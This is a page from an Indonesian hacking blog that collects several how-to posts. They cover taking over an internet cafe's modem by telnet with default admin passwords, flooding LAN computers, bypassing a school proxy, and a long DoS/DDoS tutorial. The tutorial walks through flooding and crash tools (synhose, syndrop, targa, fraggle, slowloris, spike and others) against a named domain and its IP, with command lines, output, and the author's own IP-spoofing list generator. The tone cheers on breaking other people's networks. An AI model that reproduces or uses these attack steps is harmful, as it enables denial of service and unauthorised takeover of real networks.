Selasa, 24 Agustus 2010

Cara Take Over Warnet

take over yang berarti mengambil alih, dalam mengambil alih ini adalah ambil alih modemnya atau jaringannya (tp g tau bener jg pengertiannya hehehhe maklum bukan hacker)
si warnet bsa kita apain aja, matiin koneksi, rusakin, asal perintah2nya aja pada tau
trus ini bisa ditake over cuman lan aja, kita g bsa jauh2.. tp itu jg tergantung sang IP nya... (syukur2 bisa xixixiix)

bahan2nya adalah :

1. pasang tampang baby face kita ketika masuk warnet
2. pura2 nggak ngerti apa2

actionnya:

1. buka http://myipaddress.com, trus catet IP nya untuk persiapan di takeover
2. setelah mendapatkan IP, kita buka cmd, lalu ketik "telnet"
3. setelah masuk telnet, ketik lagi "o [ip warnet yg udh dicatet td]"
4. dan teeeeeeeeeeeedeeeeeengggg masuk.. yah... tp musti login dulu
5. ayo kita coba make defaultnya
bisa :

username : admin
password : admin

username: admin
password : [kosong]

6. nah gmn??.. udh dicoba??.. bsa g??. kalo bisa, SELAMAT!! hm, anda akan langsung men Take Over tuh warnet ganti password, trus terserah deh tuh mau diapain aja, koneksi mattin atau rusakin atau apa kek.. ahahhahahah pinter tp ati2 jangan ketauan sang OP bisa dead, xixixiixix

semoga bermanfaat.. top

maaf sebelumnya, ini post pertama si dodol... Stresh

Flooding Tester di warnet

ne flooding pake tools lanAttacker
download link
http://www.4shared.com/file/98817918/29a...rr=no-sess

kalau udah download lang sung aja stef by steff

1 .buka file lan attacker yang tadi di download

[Image: lanns.jpg]

terus langsung klik install...nah kalau udah selesai install baru klik attack

2. setelah terbuka programnya terus klik scan
[Image: anattcker.jpg]


3. kemudian klik option - adapter buat setting file seberapa gede yang mau dikirim ke komputer target
[Image: 75751441.jpg]

4.nah dah selesai setting konfigurasinya kita langsung aja floodin target kebetulan yang mau ane isengin komputer no 4 dengan ip 192.168.1.14
setelah itu ceklist di ip tersebut terus klik kanan kemudian klik flood


[Image: lanaatck.jpg]

5. kemudian lihat hasil dikomputer korban
[Image: flooding.jpg]

hehheheh.....ne hanya untuk pembelajaran..tinggal di explore lagi biar tambah ajib..... ok

[ Windows ] Scanning LAN Network IP/Client

Waduh gak ngerti + gak tau harus di kasih judul apa tapi lagian yang penting isinya dah...

#Title : Manual Local Scanning IP with CMD
#Author : dewancc
#Date : Februari, 06 2010

Berikut ini adalah bagaimana cara bagaimana mengetahui IP local apa saja yang sedang surfing di jaringan kita tanpa harus menggunakan program banti seperti IP local scan.

Lets go to newbie trik...

1. Start --> Run
2. Ketik CMD
3. Ketik : Netview [ enter ]

Code:
C:\Documents and Settings\speednet>net view
Server Name            Remark

---------------------------------------------------
\\COM1                 com1
\\COM10                com10
\\COM11                com11
\\COM13                comp12
\\COM15                com20
\\COM18                com3
\\COM19
\\COM2                 com7
\\COM21                com4
\\COM3
\\COM4
\\COM5                 com5
\\COM6
\\COM7
\\COM8
\\COM9
\\COMP20               com19
\\SERVERR
The command completed successfully.

Wah ternyata di komputer tempat saya surfing setidaknya ada lebih dari 10 PC yang terkoneksi dengan LAN bahkan diantara mereka sedang melalukan surfing.

Lalu bagaimana mengetahui IP mereka ?

- Gunakan ping
Code:
ping [servername]

example
ping serverr

Setelah itu terserah anda kan melanjutkan dengan niat apa setelah mendapatkan local IP komputer server warnet [op]
- Remote
- Shutdown PC
- Burn IP [ bentrokkin IP-nya ].

Dan masih banyak lagi untuk di explorasi


Sekian tutorial dari newbie dewancc... semoga terhibur buat para om maaf ya wa bikin tutorial gak kerenz.

#Thanks :
Code:
Allah SWT , beserta nabi Muhammad SAW ( beserta pengikutnya )
DC Forum : kiddies, chaer, mywisdom, guns, n4cko, cruzen, misterfribo, dhanidunk and all DC Staff/Members
Whiber : petimati, whitehat, Agoes_doubleb, cybermuttaqin, wahyu_whitecyber, Shamus
YCL : v3n0m, lingah, leqhi, lazy, ghemax, z0mb13, ripper_maya, yoga, marco, arie, agdicool and all members/staff
Panjangan thanksnya dari pada artikelnya jiakaka.... a

Bypass proxy Mudah Bgt

Ada satu lagi tools ampuh buat bypass proxy, Ultra Surf namanya...
Mungkin kalian semua dah tau ya...pinter
Nie kasusnya gara2 kemaren ada ujian Cisco di t4 ane, alhasil si Facebook di block ma ADM, mau OL gak bisa, terpaksa cari cara, pake circimventor terasa berat bener aksesnya , ya akhirnya pake tools ini aja.
Setelah usaha yang tdk seberapa, akhirnya bisa juga OL

Akan ane jelasin 1 per 1 caranya,...>>>
1. Donlot dulu tools ini di sini <zip> atau yang ini <exe>
2. Bagi user IE, dengan hanya tool tsb, sudah langsung bisa beraksi, tapi bagi user Mozilla perlu addons nya, donlot aja di sini <zip>.
3. Jika semua dah kedonlot, saatnya beraksi.....
Langsung eksekusi Ultra Surf, klik aja .exe nya...
SCR
4. Kita ubah dikit settingan proxynya,klik aja Options, kemudian pilih Proxy Setting, ganti jadi Auto Detect Proxy.
SCR
5. Setelah itu kita install addons buat Mozilla tadi,...
Extract filenya ke desktop, kemudian drag ke window Mozilla, ada konfirm install, klik aja, Restart Firefox, jadi deh. Liat pada pojok kanan bawah, ada tulisan wj disabled, klik aja untuk enable nya.
6. Klo dah jadi, kira2 sepert ini hasilnya. Settingan ini akan otomatis terkonfig pada Mozilla.
SCR
7. Sekarang tinggal browsing semaunya
Kira2 hasilnya seperti ini>>>
Sebelum
MAaf, ADM ma Sekolahnya gak ane Blur dead
Sesudah
Cara di atas diperuntukkan buat user WIndows,....
Bagi pengguna Ubuntu jangan khawatir, bisa juga koq....

Nie caranya>>>
1. Saya anggap Ubuntu anda dah keinstall Wine, buat run Ultra Surf nya.
2. Donlot dulu DLL Ultra Surf nya di sini <zip>
3.Extract mfc42.dll dan msvcp60.dll dari file zip tadi kemudian copy ke
Code:
~/.wine/drive_c/windows/system
~/.wine/drive_c/windows/system32
Nb:~ adalah Home Directorynya
4. Secara default, .wine direktori di hidden oleh Ubuntu, gunakan Ctrl+H pada filemanager anda, nanti akan muncul.
5. Kemudian run dari terminal dengan ketik
Code:
wine u95.exe
atau klik kanan pada file u95.exe, open with Wine.
6. Dah running, pada Option ceklis " Do not use IE ", kemudian pada proxy setting, pilih auto-detect proxy.
7. Langkah selanjutnya, masuk ke System>Preferences>Network Proxy
, buat seperti itu.
8. Terakhir, klik Retry pada main window Ultra Surf, selesai.


Semoga bermanfaat ya, jangan disalah gunakan bagi para pelajar maling

DDOS dan DOS Berseni

penulis: mywisdom
tgl: 5 Mei 2010
(btw semua tulisan M4st3r di artikel ini telah teredit menjadi teks om)
[Image: den1.jpg]


Yup kembali lagi bersama saya mywisdom kali ini tentang teknik serangan
favorit ala cracker jaman dulu (termasuk saya sendiri seorang cracker) yaitu Remote DOS dan DDOS.
Perhatikan perbedaan DDOS dan DOS:
- ddos dilakukan dari banyak zombie kita yaitu mesin-mesin yang sudah kita owned dan bisa dimanfaatkan untuk serangan
- dos adalah serangan yang berasal hanya dari 1 mesin saja!!!

Sebelum melakukan DOS atau DDOS Anda wajib mengetahui port - port daemon
yang terbuka di target kita, misal kita menggunakan nmap port scanner untuk target kita sec-r1z.com, satu hal yang wajib diingat oleh tiap cracker (nama domain sec-r1z.com hanyalah sekedar contoh)
yang ingin melakukan dos maupun ddos adalah sebaiknya tidak menyerang alamat ip target tapi menyerang domain / hostname karena alamat ip bisa diubah sewaktu-waktu untuk menhindari dos maupun ddos.
Sebelum ddos maupun dos mari kita scan daemon -daemon yang terbuka untuk
celah bagi kita menyerang, berikut ini contoh penggunaan scanning port dengan nmap:

Code:
bt ~ # nmap -A sec-r1z.com -PN

Starting Nmap 4.60 ( http://nmap.org ) at 2010-03-22 04:33 GMT
Interesting ports on 86-241-63-74.SECURED-BY-SEC4SERVER.COM (74.63.241.86):
Not shown: 1668 closed ports, 36 filtered ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      PureFTPd
|_ Anonymous FTP: FTP: Anonymous login allowed
22/tcp   open  ssh      OpenSSH 4.3 (protocol 2.0)
25/tcp   open  smtp     Exim smtpd 4.69
|  SMTP: Responded to EHLO command
|  b0x.sec-r1z.com Hello example.org [111.94.9.19]
|  SIZE 52428800
|  PIPELINING
|  AUTH PLAIN LOGIN
|  STARTTLS
|  250 HELP
|  Responded to HELP command
|  Commands supported:
|_ AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP
53/tcp   open  domain
110/tcp  open  pop3     Courier pop3d
143/tcp  open  imap     Courier Imapd (released 2008)
443/tcp  open  http     Apache httpd 2.0.63
|_ HTML title: Site doesn't have a title.
465/tcp  open  ssl/smtp Exim smtpd 4.69
|  SSLv2: server still supports SSLv2
|_      the server didn't offer any cyphers
993/tcp  open  ssl/imap Courier Imapd (released 2008)
|  SSLv2: server still supports SSLv2
|_      the server didn't offer any cyphers
995/tcp  open  ssl/pop3 Courier pop3d
|  SSLv2: server still supports SSLv2
|_      the server didn't offer any cyphers
3306/tcp open  mysql    MySQL 5.0.90-community
|  MySQL Server Information: Protocol: 10
|  Version: 5.0.90-community
|  Thread ID: 9230
|  Some Capabilities: Connect with DB, Compress, Transactions, Secure Connection
|  Status: Autocommit
|_ Salt: @Te"s?}zn9nA:?l"cM6e
Device type: storage-misc
Running (JUST GUESSING) : BlueArc embedded (91%)
Aggressive OS guesses: BlueArc Titan 2100 NAS device (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: b0x.sec-r1z.com

TRACEROUTE (using port 21/tcp)
HOP RTT    ADDRESS
1   0.09   192.168.153.2
2   280.82 86-241-63-74.SECURED-BY-SEC4SERVER.COM (74.63.241.86)

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 579.436 seconds
bt ~ #

Ok dari hasil scan ke sec-r1z.com kita bisa lihat kalau port-port berikut ini terbuka sehingga memungkinkan serangan kita:
Code:
21
22
25
53
110
143
443
465
993
995
3306

Jadi kita bisa menggempur target kita ke semua port tersebut.

Tips!!!
Agar DDOS lebih efektif sebaiknya serang semua port daemon yang terbuka
dan bagi yg port 80 open serangan difokuskan lebih ke port 80.


Aneka Tool & Teknik Untuk DOS / DDOS

Asiknya ICMP ATTACK
Ok selanjutnya kita bisa juga melakukan pengujian apakah box tersebut bisa
kita serang dengan icmp packets:
Code:
bt ~ # ping sec-r1z.com
PING sec-r1z.com (74.63.241.86) 56(84) bytes of data.
64 bytes from 86-241-63-74.SECURED-BY-SEC4SERVER.COM (74.63.241.86): icm=10 ttl=128 time=273 ms

[2]+  Stopped                 ping sec-r1z.com
bt ~ #

Ok kita bisa melihat ketika kita ping sec-r1z.com dan ipnya diresolve ke 74.63.241.86 dan juga direply langsung olehnya :
reply 64 bytes dari 74.63.241.86 yang menandakan kita bisa menambahkan efek serangan icmp ke target kita.

Contoh Teknik dasar untuk melakukan ping flood dari root shell unix atau linux kita, ketikkan ini (misal target host adalah sec-r1z.com):
Code:
ping sec-r1z.com -fs 50000
PING sec-r1z.com (74.63.241.86) 50000(50028) bytes of data.
.......................................................
[3]+  Stopped                 ping sec-r1z.com -fs 50000


Asiknya SYN Attack
[Image: den2.jpg]
syn attack merupakan salah satu metode penyerangan favorit attacker jaman dulu yang memanfaatkan kelemahan three way handsake.
Salah satu tool yang biasa saya pakai untuk syn attack adalah synhose, Di mana synhose ini akan melakukan spoof random ip untuk mengirimkan paket ke target kita, sehingga seolah olah di target kita menerima banyak serangan dari ip yang berbeda.
SEcara default jika tidak diset di argumen maka synhose akan menyerang port 80, bisa kita liat di sourcenya:
Code:
if(port == 0) port = 80;

Misal kita akan menyerang sec-r1z.com di port terbuka 80 dari 10 spoof ip berbeda berikut ini contohnya:
Code:
bt ~ # ./synhose sec-r1z.com 80 10
SynHose [A random source IP syn flooder]
Written by knight / Idea by   : rza

Destination  : sec-r1z.com
Port         : 80
NumberOfTimes: 10

SynHosing sec-r1z.com at port 80 from 108.248.253.31 port 2884
SynHosing sec-r1z.com at port 80 from 248.36.16.139 port 4
SynHosing sec-r1z.com at port 80 from 68.48.179.170 port 409
SynHosing sec-r1z.com at port 80 from 5.54.172.218 port 9780
SynHosing sec-r1z.com at port 80 from 156.228.227.167 port 5327
SynHosing sec-r1z.com at port 80 from 108.99.240.141 port 1746
SynHosing sec-r1z.com at port 80 from 242.249.38.240 port 924
SynHosing sec-r1z.com at port 80 from 111.233.60.127 port 4544
SynHosing sec-r1z.com at port 80 from 60.194.164.239 port 4234
SynHosing sec-r1z.com at port 80 from 174.243.162.91 port 8044
bt ~ #

dari result di atas komputer kita mengirimkan paket syn ke sec-r1z.com dengan port tujuan 80 dari berbagai ip, misal yang terakhir dari spoof ip 174.243.162.91 melalui port 8044.

Hanya dari 10 ip tentu kurang sedap bukan?? mari kita serang dari 10000 ip berbeda:
Code:
bt ~ # ./synhose sec-r1z.com 80 10000

ooopssssss :))

Juno
Juno merupakan syn attack tool yang cukup terkenal, berikut ini adalah contoh cara pakainya (misal target adalah sec-r1z.com di port 80):
Code:
bt ~ # ./juno sec-r1z.com 80
juno.c by Sorcerer of DALnet
death to 74.63.241.86:80

[Image: den9.jpg]



syndrop

Syndrop merupakan tool yang mengabungkan syn attack dan teardrop,berikut ini adalah contoh penggunaan syndrop dengan target host sec-r1z:
Code:
bt ~ # ./syndrop 127.0.0.1 sec-r1z.com -s 31337 -t 80 -n 99999999 -S 20 -E 9999
syndrop by PineKoan
Death on flaxen wings:
From:       127.0.0.1.31337
  To:    74.63.241.86.   80
Amt: 99999999
[ b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b0

[Image: den10.jpg]



--------------------------------------------------------------------------


Jolt

[Image: den2.jpg]

Jika dilihat dari source codenya,Jolt merupakan salah satu tool untuk DOS yang akan mengirimkan paket icmp ke target kita, Pada jaman dahulu kala jolt ini banyak digunakan untuk membekukan server - server windows
jenis serangan adalah pengiriman paket icmp
Code:
icmp->type = ICMP_ECHO;

Berikut ini demo penggunaan jolt:
Code:
bt ~ # ./jolt 74.63.241.86 127.0.0.1 99999999
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
..................dst



Targa

Targa merupakan tool dos yang merupakan kombinasi dari tool2 ini:

* bonk by route|daemon9 & klepto
* jolt by Jeff W. Roberson (modified by Mixter for overdrop effect)
* land by m3lt
* nestea by humble & ttol
* newtear by route|daemon9
* syndrop by PineKoan
* teardrop by route|daemon9
* winnuke by _eci

header2 file yang digunakan oleh targa cukup repot juga dan tidak ada di backtrack secara default, jadi saya tambahkan sendiri, berikut ini header file saya di /usr/include/netinet sehingga berhasil mengkompile targa.c:
Code:
bt netinet # ls
ether.h  if_ether.h  if_tr.h  in.h        ip.h   ip_icmp.h  ip_udp.h    protocols.h  udp.h
icmp6.h  if_fddi.h   igmp.h   in_systm.h  ip6.h  ip_tcp.h   protocol.h  tcp.h
bt netinet #


Misal kita ingin menyerang seluruh range ip dari range ip 74.63.241.86-74.63.241.88
[Image: den2.jpg]

Berikut ini adalah contohnya:
Code:
bt ~ # ./targa 74.63.241.86 74.63.241.88 -t 0 -n 999999
                targa 1.0 by Mixter
Leetness on faxen wings:
To: 74.63.241.86 - 74.63.241.88
Repeats: 999999
   Type:     0
74.63.241.86 [ $$$$$$$$$$$$$$$@@@@@@@@@@@@@@@-----....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................#####################&&&&&&&&&&&&&&&&&&&&&%%%%%%%%%%%%%%%%%%%%%

opsi -t 0 berarti anda menyerang dengan menggunakan gabungan semua teknik.
opsi -n 999999 merupakan jumlah pengulangan sebanyak 999999


Boink
Merupakan tool yang bisa membuat blue screen of death pada mesin-mesin windows 9x dan nt.
Berikut ini contoh cara penggunaanya:
Code:
bt ~ # ./boink 127.0.0.1 74.63.241.86 80 80 99999999999
(0)74.63.241.86:25->65
(1)74.63.241.86:25->65
(2)74.63.241.86:25->65
(3)74.63.241.86:25->65
(4)74.63.241.86:25->65
(5)74.63.241.86:25->65
(6)74.63.241.86:25->65
(7)74.63.241.86:25->65
(8)74.63.241.86:25->65
(9)74.63.241.86:25->65
(10)74.63.241.86:25->65
(11)74.63.241.86:25->65
(12)74.63.241.86:25->65
(13)74.63.241.86:25->65
(14)74.63.241.86:25->65
(15)74.63.241.86:25->65
(16)74.63.241.86:25->65
(17)74.63.241.86:25->65
(18)74.63.241.86:25->65
(19)74.63.241.86:25->65
(20)74.63.241.86:25->65
(21)74.63.241.86:25->65
(22)74.63.241.86:25->65
(23)74.63.241.86:25->65
(24)74.63.241.86:25->65
(25)74.63.241.86:25->65
dst ...........



Asiknya Smurf & UDP Attack

Smurf attack merupakan teknik penyerangan dengan mengirimkan paket icmp yang dispoof ke target kita

Bloop
Merupakan salah satu tool dos dengan metode smurf attack.
Bloop akan mengirimkan paket icmp spoof secara acak ke target kita untuk membuat mesin target crash.

Berikut ini adalah contoh penggunaan bloop:
Code:
bt ~ # ./bloop 127.0.0.1 sec-r1z.com 99999999
Bloop v 1.0



Status: Connected....packets sent.

[Image: den6.jpg]


Fraggle
Fraggle merupakan tool untuk tipe smurf dos / ddos yang menggunakan suatu file broadcast yang berisi daftar alamat2 ip spoof.

Sebelum menggunakan fraggle kita memerlukan sebuah file broadcast ip spoof, Untuk itu
saya sudah membuat sendiri tool untuk spoof ip generator namanya dimas.c:

filename:dimas.c , programmer: mywisdom
Code:
/*dimas.c random ip generator (public ip and private ip)
version 1.0
c0d3r: mywisdom
greetz:gunslinger,flyff666,kiddies,xtr0nic,whitehat,Danzel and so on
*/
#include
#include
#include
void bikin_random_ip()
{
FILE *dom2;
int a,b,c,d,a2,b2,jum;
dom2=fopen("ip.txt","w+"); 
    for(;;)
{
   srand ( time(NULL) );
      a = rand ()% 255 ;
    
      b = rand ()% 255 ;
    
      c = rand ()% 255 ;
   
      d = rand ()% 255 ;
  
  if ( (a != 10) && (a != 172) && (a != 192))
   {     
      if(dom2!=NULL)
       {
         if(a2!=a)
         {  
       fprintf(dom2,"%d.%d.%d.%d\n",a,b,c,d);
         }
       }
   }

a2=a;
}
fclose(dom2);

}

int main ()
{
bikin_random_ip();
return 0;
}

kompile file di atas dan run untuk membuat file ip spoof dengan nama file: ip.txt

Code:
gcc -o dimas dimas.c
./dimas

Selanjutnya misal target kita sec-r1z.com, contoh penggunaan fraggle untuk menyerang sec-r1z.com:
Code:
bt ~ # ./fraggle sec-r1z.com  ip.txt 2000 900   80 0   99

fraggle.c by TFreak

Flooding sec-r1z.com (. = 25 outgoing packets)
................................................................................
Done!

bt ~ #

[Image: den6.jpg]


TCP Attack
Khusus untuk http ddos banyak tool yang bisa kita pakai
misal:
slowloris

slowloris biasanya khusus digunakan untuk menyerang http port
,keunggulan slowloris adalah hanya menggunakan bandwoth yang kecil dari server attacker,
tool ini akan mengirimkan http request dalam ukuran panjang berupa angka random panjang
terlihat dari source codenya:
Code:
if ($cache) {
                        $rand = "?" . int( rand(99999999999999) );
                    }

Contoh penggunaan slowloris untuk menyerang sec-r1z.com :

Code:
bt ~ # ./slowloris.pl -dns www.sec-r1z.com -port 80 -timeout 30 -num 500 -cache

CCCCCCCCCCOOCCOOOOO888@8@8888OOOOCCOOO888888888@@@@@@@@@8@8@@@@888OOCooocccc::::​
CCCCCCCCCCCCCCCOO888@888888OOOCCCOOOO888888888888@88888@@@@@@@888@8OOCCoococc:::​
CCCCCCCCCCCCCCOO88@@888888OOOOOOOOOO8888888O88888888O8O8OOO8888@88@@8OOCOOOCoc::​
CCCCooooooCCCO88@@8@88@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888@8888OOOCc::::​
CooCoCoooCCCO8@88@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc:​
ooooooCoCCC88@88888@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88@888OCoccc​
ooooCCOO8O888888888@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo​
oCCCCCCO8OOOCCCOO88@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC​
oCCCCCOOO88OCooCO88@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC​
oCCCCOO88OOCCCCOO8@@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO
CCCOOOO88OOCCOOO8@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O
CCCOO88888OOCOO8@@888OCcc:::cCOO888Oc..... ....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
OOOOOO88888OOOO8@8@8Ooc:.:...cOO8O88c.      .  .coOOO888OOOOCoooooccoCOOOOOCOOOO
OOOOO888@8@88888888Oo:. .  ...cO888Oc..          :oOOOOOOOOOCCoocooCoCoCOOOOOOOO
COOO888@88888888888Oo:.       .O8888C:  .oCOo.  ...cCCCOOOoooooocccooooooooCCCOO
CCCCOO888888O888888Oo. .o8Oo. .cO88Oo:       :. .:..ccoCCCooCooccooccccoooooCCCC
coooCCO8@88OO8O888Oo:::... ..  :cO8Oc. . .....  :.  .:ccCoooooccoooocccccooooCCC
:ccooooCO888OOOO8OOc..:...::. .co8@8Coc::..  ....  ..:cooCooooccccc::::ccooCCooC
.:::coocccoO8OOOOOOC:..::....coCO8@8OOCCOc:...  ....:ccoooocccc:::::::::cooooooC
....::::ccccoCCOOOOOCc......:oCO8@8@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo
.......::::::::cCCCCCCoocc:cO888@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc
...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co
.............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::....... ...:::cccc:cooo
..... ............. .coocoooCCoco:::ccccccc:::ccc::..........  ....:::cc::::coC
   .  . ...    .... ..  .:cccoCooc:..  ::cccc:::c:.. ......... ......::::c:cccco
  .  .. ... ..    .. ..   ..:...:cooc::cccccc:.....  .........  .....:::::ccoocc
       .   .         .. ..::cccc:.::ccoocc:. ........... ..  . ..:::.:::::::ccco

Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client

Defaulting to a 5 second tcp connection timeout.
Multithreading enabled.
Connecting to www.sec-r1z.com:80 every 30 seconds with 500 sockets:
                Building sockets.
                Building sockets.
                Building sockets.
                Building sockets.
                Building sockets.
                Building sockets.
                Building sockets.
                Building sockets.
                Building sockets.
                Building sockets.

[Image: den7.jpg]

Tembak.c
Ini sih tool buat nuke yang udah lama banget buatan anak echo :)) dah ada dari jaman baheula :)), ok mari kita coba pakai lagi untuk contoh target sec-r1z.com :
Code:
bt ~ # ./tembak

Kirim Paket ke IP orang

Cara Pake : $ tembak hostname.orang port

bt ~ # ./tembak sec-r1z.com 80

Serbuu....!!!! Hancurkaannn sec-r1z.com ke port 80

[Image: den12.jpg]


httpd_flood.pl
Ini dia nih perl skrip khusus untuk mengantung socket httpd :)).khusus hanya menyerang http daemon (port 80)
Berikut ini adalah contoh cara pakainya, misal target tbd.my, misal kita menggunakan lama serangan infinite (selamanya) dan kita run di background di salah satu mesin yang kita root:
Code:
./httpd_flood.pl tbd.my -1 99999 -1 &

Teknik Serangan Gabungan
Teknik serangan gabungan ini menggabungkan aneka jenis serangan, Anda bisa coba tool ini: spike
ok mari kita lihat semua tool2 yang digabung menjadi satu teknik serangan mematikan oleh spike:
Code:
bt spike # ls
README  bin/  sources/  spike.sh*  spike.sh~*
bt spike # ls bin
1234*   conseal*  jolt*   latierra*  orgasm*  spiffit*  teardrop*
beer*   dcd3c*    kkill*  misfrag*   pepsi*   sping*    trash*
boink*  fawx*     koc*    nestea*    pimp*    stream*   udpdata*
bonk*   gewse*    kox*    newtear*   pong*    syndrop*  wingatecrash*
coke*   gewse5*   land*   opentear*  smurf*   synk*
bt spike #

sudah anda lihat kan? tool ini menggabungkan berbagai macam ddos tool menjadi 1
Mari kita coba run tool ini untuk attack target kita misal: sec-r1z.com
Code:
bt spike # ./spike.sh sec-r1z.com
Main Menu For spike.sh
1] Combo Attacks
2] Pick The Attack
3] Pick The Attack2 (Enter Your Own Info)
4] Class C Attack (Drop A Class C)
5] Never Die (Attacks That Never Die)
6] Clean up (Kill Hung Attacks)
7] Info Menu (Other Info About spike.sh)
8] To Exit Out

Enter The Number Of The Option To Run:

misal kita ingin menggunakan combo attack untuk menyerang target kita
ketikkan 1.

Maka akan muncul pilihan 3 jenis serangan berdasarkan tingkat ganasnya serangan ( kek maen game aja yah hahahaahaha):
Code:
ComboAttack Menu\033[0m
1] Light Attack   (12 Attacks)
2] Medium Attack  (20 Attacks)
3] Hard Attack    (33 Attacks)
4] To Exit Out

Enter The Number Of The Option To Run
#> \c

Misal kita pilih yang hard attack, ketikkan 3 !!!
Code:
ComboAttack Menu\033[0m
1] Light Attack   (12 Attacks)
2] Medium Attack  (20 Attacks)
3] Hard Attack    (33 Attacks)
4] To Exit Out

Enter The Number Of The Option To Run
#> \c
3
Teadroping.....
Completed....
Pimping.....
Completed....
Nesteaing.....
Completed....
Misfraging.....
Completed....
Syndroping.....
Completed....
Koxing.....
Completed....
NewTearing.....
Completed....
Bonking.....
Completed....
Fawxing.....
Completed....
Trashing.....
Completed....
Smurfing....
Completed....
Attacking On Hold For BandWidth
Completed....
Boinking.....
Completed....
Conseal Firewall Attacking.....
Completed....
Jolting.....
Completed....
Modem +++ DoSing
dst...

[Image: den11.jpg]


Pembahasan Khusus Tambahan

Trinoo
